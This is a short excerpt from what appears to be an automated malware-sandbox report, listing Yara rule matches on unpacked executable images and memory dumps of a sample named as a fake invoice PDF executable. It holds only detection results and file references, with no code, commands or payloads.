Source: Yara match File source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.2242460905.0000000002830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2930839169.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2932524352.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2240933872.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2931097936.0000000003840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY